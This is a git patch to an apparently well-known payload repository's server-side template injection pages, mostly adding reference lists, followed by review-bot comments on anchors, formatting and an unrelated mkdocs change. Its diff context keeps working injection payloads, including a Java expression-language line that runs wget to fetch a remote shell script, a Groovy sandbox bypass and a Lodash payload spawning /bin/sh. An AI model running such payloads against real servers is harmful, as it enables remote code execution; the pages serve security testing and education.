From 21dfd91180bdf2245201d0107a17857355704e23 Mon Sep 17 00:00:00 2001 From: Swissky <12152583+swisskyrepo@users.noreply.github.com> Date: Sun, 3 Nov 2024 20:54:01 +0100 Subject: [PATCH] SSTI references updates --- Server Side Template Injection/ASP.md | 8 +++++ .../ExpressionLanguage.md | 14 ++++++++- Server Side Template Injection/Java.md | 10 ++++++- Server Side Template Injection/JavaScript.md | 7 +++-- Server Side Template Injection/PHP.md | 6 +++- Server Side Template Injection/Python.md | 5 +++- Server Side Template Injection/README.md | 29 +++---------------- Server Side Template Injection/Ruby.md | 6 +++- mkdocs.yml | 6 ++-- 9 files changed, 56 insertions(+), 35 deletions(-) diff --git a/Server Side Template Injection/ASP.md b/Server Side Template Injection/ASP.md index a9a00fa5..593669a7 100644 --- a/Server Side Template Injection/ASP.md +++ b/Server Side Template Injection/ASP.md @@ -5,13 +5,16 @@ - [ASP.NET Razor](#aspnet-razor) - [ASP.NET Razor - Basic injection](#aspnet-razor---basic-injection) - [ASP.NET Razor - Command execution](#aspnet-razor---command-execution) +- [References](#references) ## ASP.NET Razor [Official website](https://docs.microsoft.com/en-us/aspnet/web-pages/overview/getting-started/introducing-razor-syntax-c) + > Razor is a markup syntax that lets you embed server-based code (Visual Basic and C#) into web pages. + ### ASP.NET Razor - Basic injection ```powershell @@ -25,3 +28,8 @@ // C# code } ``` + + +## References + +- [Server-Side Template Injection (SSTI) in ASP.NET Razor - Clément Notin - April 15, 2020](https://clement.notin.org/blog/2020/04/15/Server-Side-Template-Injection-(SSTI)-in-ASP.NET-Razor/) \ No newline at end of file diff --git a/Server Side Template Injection/ExpressionLanguage.md b/Server Side Template Injection/ExpressionLanguage.md index cd3444c6..12094f2b 100644 --- a/Server Side Template Injection/ExpressionLanguage.md +++ b/Server Side Template Injection/ExpressionLanguage.md 
@@ -6,6 +6,7 @@ - [Expression Language EL - Basic injection](#expression-language-el---basic-injection) - [Expression Language EL - One-Liner injections not including code execution](#expression-language-el---one-liner-injections-not-including-code-execution) - [Expression Language EL - Code Execution](#expression-language-el---code-execution) +- [References](#references) ## Expression Language EL 
@@ -80,4 +81,15 @@ T(java.lang.Runtime).getRuntime().exec('whoami').x // Method using ScriptEngineManager ${facesContext.getExternalContext().setResponseHeader("output","".getClass().forName("javax.script.ScriptEngineManager").newInstance().getEngineByName("JavaScript").eval(\"var x=new java.lang.ProcessBuilder;x.command(\\\"wget\\\",\\\"http://x.x.x.x/1.sh\\\");org.apache.commons.io.IOUtils.toString(x.start().getInputStream())\"))} -``` \ No newline at end of file +``` + + +## References + +- [Bean Stalking: Growing Java beans into RCE - Alvaro Munoz - July 7, 2020](https://securitylab.github.com/research/bean-validation-RCE) +- [Bug Writeup: RCE via SSTI on Spring Boot Error Page with Akamai WAF Bypass - Peter M (@pmnh_) - December 4, 2022](https://h1pmnh.github.io/post/writeup_spring_el_waf_bypass/) +- [Expression Language Injection - OWASP - 2024](https://owasp.org/www-community/vulnerabilities/Expression_Language_Injection) +- [Expression Language injection - PortSwigger - 2024](https://portswigger.net/kb/issues/00100f20_expression-language-injection) +- [Leveraging the Spring Expression Language (SpEL) injection vulnerability (a.k.a The Magic SpEL) to get RCE - Xenofon Vassilakopoulos - November 18, 2021](https://xen0vas.github.io/Leveraging-the-SpEL-Injection-Vulnerability-to-get-RCE/) +- [RCE in Hubspot with EL injection in HubL - @fyoorer - December 7, 2018](https://www.betterhacker.com/2018/12/rce-in-hubspot-with-el-injection-in-hubl.html) +- [Remote Code Execution with EL Injection Vulnerabilities - Asif Durani - January 29, 2019](https://www.exploit-db.com/docs/english/46303-remote-code-execution-with-el-injection-vulnerabilities.pdf) \ No newline at end of file diff --git a/Server Side Template Injection/Java.md b/Server Side Template Injection/Java.md index 3d979aab..c12e352d 100644 --- a/Server Side Template Injection/Java.md +++ b/Server Side Template Injection/Java.md 
@@ -27,6 +27,7 @@ - [Groovy - HTTP request:](#groovy---http-request) - [Groovy - Command Execution](#groovy---command-execution) - [Groovy - Sandbox Bypass](#groovy---sandbox-bypass) +- [References](#references) ## Templating Libraries @@ -276,4 +277,11 @@ or ${ new groovy.lang.GroovyClassLoader().parseClass("@groovy.transform.ASTTest(value={assert java.lang.Runtime.getRuntime().exec(\"calc.exe\")})def x") } ``` ---- + +## References + +- [Server Side Template Injection – on the example of Pebble - Michał Bentkowski - September 17, 2019](https://research.securitum.com/server-side-template-injection-on-the-example-of-pebble/) +- [Server-Side Template Injection: RCE For The Modern Web App - James Kettle @albinowax - December 10, 2015](https://gist.github.com/Yas3r/7006ec36ffb987cbfb98) +- [Server-Side Template Injection: RCE For The Modern Web App (PDF) - James Kettle @albinowax](https://www.blackhat.com/docs/us-15/materials/us-15-Kettle-Server-Side-Template-Injection-RCE-For-The-Modern-Web-App-wp.pdf) +- [Server-Side Template Injection: RCE For The Modern Web App (Video) - James Kettle @albinowax - December 28, 2015](https://www.youtube.com/watch?v=3cT0uE7Y87s) +- [VelocityServlet Expression Language injection - MagicBlue - November 15, 2017](https://magicbluech.github.io/2017/11/15/VelocityServlet-Expression-language-Injection/) \ No newline at end of file diff --git a/Server Side Template Injection/JavaScript.md b/Server Side Template Injection/JavaScript.md index fa3f4aae..a3951d8e 100644 --- a/Server Side Template Injection/JavaScript.md +++ b/Server Side Template Injection/JavaScript.md @@ -8,7 +8,7 @@ - [Lodash](#Lodash) - [Lodash - Basic Injection](#lodash---basic-injection) - [Lodash - Command Execution](#lodash---command-execution) - +- [References](#references) ## Templating Libraries 
@@ -104,5 +104,8 @@ ${= _.VERSION} {{x=Object}}{{w=a=new x}}{{w.type="pipe"}}{{w.readable=1}}{{w.writable=1}}{{a.file="/bin/sh"}}{{a.args=["/bin/sh","-c","id;ls"]}}{{a.stdio=[w,w]}}{{process.binding("spawn_sync").spawn(a).output}} ``` ---- +## References + +- [Exploiting Less.js to Achieve RCE - Jeremy Buis - July 1, 2021](https://web.archive.org/web/20210706135910/https://www.softwaresecured.com/exploiting-less-js/) +- [Handlebars template injection and RCE in a Shopify app - Mahmoud Gamal - April 4, 2019](https://mahmoudsec.blogspot.com/2019/04/handlebars-template-injection-and-rce.html) \ No newline at end of file diff --git a/Server Side Template Injection/PHP.md b/Server Side Template Injection/PHP.md index 9b0eb730..3732b77b 100644 --- a/Server Side Template Injection/PHP.md +++ b/Server Side Template Injection/PHP.md @@ -15,6 +15,7 @@ - [patTemplate](#pattemplate) - [PHPlib](#phplib-and-html_template_phplib) - [Plates](#plates) +- [References](#references) ## Templating Libraries @@ -247,4 +248,7 @@ layout template: ``` ---- \ No newline at end of file + +## References + +* [TODO](#todo) \ No newline at end of file diff --git a/Server Side Template Injection/Python.md b/Server Side Template Injection/Python.md index c500a018..b57cac98 100644 --- a/Server Side Template Injection/Python.md +++ b/Server Side Template Injection/Python.md 
@@ -413,4 +413,7 @@ PoC : ## References -* [Python context free payloads in Mako templates - podalirius - August 26, 2021](https://podalirius.net/en/articles/python-context-free-payloads-in-mako-templates/) \ No newline at end of file +- [Cheatsheet - Flask & Jinja2 SSTI - phosphore - September 3, 2018](https://pequalsnp-team.github.io/cheatsheet/flask-jinja2-ssti) +- [Exploring SSTI in Flask/Jinja2, Part II - Tim Tomes - March 11, 2016](https://web.archive.org/web/20170710015954/https://nvisium.com/blog/2016/03/11/exploring-ssti-in-flask-jinja2-part-ii/) +- [Jinja2 template injection filter bypasses - Sebastian Neef - August 28, 2017](https://0day.work/jinja2-template-injection-filter-bypasses/) +- [Python context free payloads in Mako templates - podalirius - August 26, 2021](https://podalirius.net/en/articles/python-context-free-payloads-in-mako-templates/) \ No newline at end of file diff --git a/Server Side Template Injection/README.md b/Server Side Template Injection/README.md index 90434fa8..eaa48659 100644 --- a/Server Side Template Injection/README.md +++ b/Server Side Template Injection/README.md 
@@ -83,28 +83,7 @@ Once the template engine is identified, the attacker injects more complex expres ## References -* [https://nvisium.com/blog/2016/03/11/exploring-ssti-in-flask-jinja2-part-ii/](https://nvisium.com/blog/2016/03/11/exploring-ssti-in-flask-jinja2-part-ii/) -* [Ruby ERB Template injection - TrustedSec](https://www.trustedsec.com/2017/09/rubyerb-template-injection/) -* [Gist - Server-Side Template Injection - RCE For the Modern WebApp by James Kettle (PortSwigger)](https://gist.github.com/Yas3r/7006ec36ffb987cbfb98) -* [PDF - Server-Side Template Injection: RCE for the modern webapp - @albinowax](https://www.blackhat.com/docs/us-15/materials/us-15-Kettle-Server-Side-Template-Injection-RCE-For-The-Modern-Web-App-wp.pdf) -* [VelocityServlet Expression Language injection](https://magicbluech.github.io/2017/11/15/VelocityServlet-Expression-language-Injection/) -* [Cheatsheet - Flask & Jinja2 SSTI - Sep 3, 2018 • By phosphore](https://pequalsnp-team.github.io/cheatsheet/flask-jinja2-ssti) -* [RCE in Hubspot with EL injection in HubL - @fyoorer](https://www.betterhacker.com/2018/12/rce-in-hubspot-with-el-injection-in-hubl.html?spref=tw) -* [Jinja2 template injection filter bypasses - @gehaxelt, @0daywork](https://0day.work/jinja2-template-injection-filter-bypasses/) -* [Gaining Shell using Server Side Template Injection (SSTI) - David Valles - Aug 22, 2018](https://medium.com/@david.valles/gaining-shell-using-server-side-template-injection-ssti-81e29bb8e0f9) -* [EXPLOITING SERVER SIDE TEMPLATE INJECTION WITH TPLMAP - BY: DIVINE SELORM TSA - 18 AUG 2018](https://www.owasp.org/images/7/7e/Owasp_SSTI_final.pdf) -* [Server Side Template Injection – on the example of Pebble - MICHAŁ BENTKOWSKI | September 17, 2019](https://research.securitum.com/server-side-template-injection-on-the-example-of-pebble/) -* [Server-Side Template Injection (SSTI) in ASP.NET Razor - Clément Notin - 15 APR 
2020](https://clement.notin.org/blog/2020/04/15/Server-Side-Template-Injection-(SSTI)-in-ASP.NET-Razor/) -* [Expression Language injection - PortSwigger](https://portswigger.net/kb/issues/00100f20_expression-language-injection) -* [Bean Stalking: Growing Java beans into RCE - July 7, 2020 - Github Security Lab](https://securitylab.github.com/research/bean-validation-RCE) -* [Remote Code Execution with EL Injection Vulnerabilities - Asif Durani - 29/01/2019](https://www.exploit-db.com/docs/english/46303-remote-code-execution-with-el-injection-vulnerabilities.pdf) -* [Handlebars template injection and RCE in a Shopify app ](https://mahmoudsec.blogspot.com/2019/04/handlebars-template-injection-and-rce.html) -* [Lab: Server-side template injection in an unknown language with a documented exploit](https://portswigger.net/web-security/server-side-template-injection/exploiting/lab-server-side-template-injection-in-an-unknown-language-with-a-documented-exploit) -* [Exploiting Less.js to Achieve RCE](https://www.softwaresecured.com/exploiting-less-js/) -* [A Pentester's Guide to Server Side Template Injection (SSTI)](https://www.cobalt.io/blog/a-pentesters-guide-to-server-side-template-injection-ssti) -* [Django Templates Server-Side Template Injection](https://lifars.com/wp-content/uploads/2021/06/Django-Templates-Server-Side-Template-Injection-v1.0.pdf) -* [#HITB2022SIN #LAB Template Injection On Hardened Targets - Lucas 'BitK' Philippe](https://youtu.be/M0b_KA0OMFw) -* [Bug Writeup: RCE via SSTI on Spring Boot Error Page with Akamai WAF Bypass - Dec 4, 2022](https://h1pmnh.github.io/post/writeup_spring_el_waf_bypass/) -* [Leveraging the Spring Expression Language (SpEL) injection vulnerability ( a.k.a The Magic SpEL) to get RCE - Xenofon Vassilakopoulos - November 18, 2021](https://xen0vas.github.io/Leveraging-the-SpEL-Injection-Vulnerability-to-get-RCE/) -* [Expression Language Injection - 
OWASP](https://owasp.org/www-community/vulnerabilities/Expression_Language_Injection) -* [Template Engines Injection 101 - Mahmoud M. Awali - Nov 1, 2024](https://medium.com/@0xAwali/template-engines-injection-101-4f2fe59e5756) \ No newline at end of file +- [A Pentester's Guide to Server Side Template Injection (SSTI) - Busra Demir - December 24, 2020](https://www.cobalt.io/blog/a-pentesters-guide-to-server-side-template-injection-ssti) +- [Gaining Shell using Server Side Template Injection (SSTI) - David Valles - August 22, 2018](https://medium.com/@david.valles/gaining-shell-using-server-side-template-injection-ssti-81e29bb8e0f9) +- [Template Engines Injection 101 - Mahmoud M. Awali - November 1, 2024](https://medium.com/@0xAwali/template-engines-injection-101-4f2fe59e5756) +- [Template Injection On Hardened Targets - Lucas 'BitK' Philippe - September 28, 2022](https://youtu.be/M0b_KA0OMFw) \ No newline at end of file diff --git a/Server Side Template Injection/Ruby.md b/Server Side Template Injection/Ruby.md index 89bb8d32..b6b3339a 100644 --- a/Server Side Template Injection/Ruby.md +++ b/Server Side Template Injection/Ruby.md @@ -8,6 +8,7 @@ - [Ruby - Retrieve /etc/passwd](#ruby---retrieve-etcpasswd) - [Ruby - List files and directories](#ruby---list-files-and-directories) - [Ruby - Remote Command execution](#ruby---remote-Command-execution) +- [References](#referenecs) ## Templating Libraries @@ -70,4 +71,7 @@ Execute code using SSTI for **Slim** engine. #{ %x|env| } ``` ---- \ No newline at end of file + +## References + +* [Ruby ERB Template Injection - Scott White & Geoff Walton - September 13, 2017](https://web.archive.org/web/20181119170413/https://www.trustedsec.com/2017/09/rubyerb-template-injection/) \ No newline at end of file diff --git a/mkdocs.yml b/mkdocs.yml index 0f3dd3ee..1c4cd92b 100644 --- a/mkdocs.yml +++ b/mkdocs.yml 
@@ -62,9 +62,9 @@ markdown_extensions: - pymdownx.emoji: emoji_index: !!python/name:material.extensions.emoji.twemoji emoji_generator: !!python/name:material.extensions.emoji.to_svg - - mdx_truly_sane_lists: - nested_indent: 2 - # truly_sane: True + # - mdx_truly_sane_lists: + # nested_indent: 2 + # truly_sane: True plugins: - search
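Review bot: the new TOC entry in the Ruby.md hunk has a misspelled anchor: `+- [References](#referenecs)` points at `#referenecs`, while the `## References` heading added in the following hunk generates `#references`, so the link is dead as committed. Change it to `- [References](#references)`, as the other files in this patch do.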
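Review bot: the References section added to PHP.md is a placeholder, `+* [TODO](#todo)`, linking to an anchor that does not exist; either populate it before merging or leave the section (and its TOC entry) out until there is an entry to cite. The same hunk, and the Ruby.md References hunk, also use `*` bullets where every other reference list added in this patch (ASP.md, ExpressionLanguage.md, Java.md, JavaScript.md, Python.md, README.md) uses `-`; switching both to `-` keeps the style consistent.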
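Review bot: three references removed from README.md in that hunk do not reappear in any of the per-language lists added elsewhere in the patch: the PortSwigger lab `Server-side template injection in an unknown language with a documented exploit`, `EXPLOITING SERVER SIDE TEMPLATE INJECTION WITH TPLMAP` (OWASP PDF) and `Django Templates Server-Side Template Injection` (LIFARS PDF). If dropping them is intended, the commit message should say so; otherwise the Django entry belongs in Python.md's new list and the other two should stay in README.md, formatted like the surviving entries (title, author, date).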
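Review bot: commenting out `mdx_truly_sane_lists` (with its `nested_indent: 2` setting) in mkdocs.yml is unrelated to the subject `SSTI references updates` and is not explained anywhere in the patch; disabling the extension changes how nested lists render across the whole generated site, not just the SSTI pages. Split it into its own commit with a message stating why it is being turned off, and if the intent is permanent removal, delete the lines rather than leaving them commented.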
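Review bot: every Markdown file touched here ends with `\ No newline at end of file` after the newly added last reference (ASP.md, ExpressionLanguage.md, Java.md, JavaScript.md, PHP.md, Python.md, README.md, Ruby.md); the ExpressionLanguage.md hunk even fixes that for the closing fence only to reintroduce it on the final reference line. Terminate each file with a newline so the next reference appended does not produce a spurious `-`/`+` pair on the previous line.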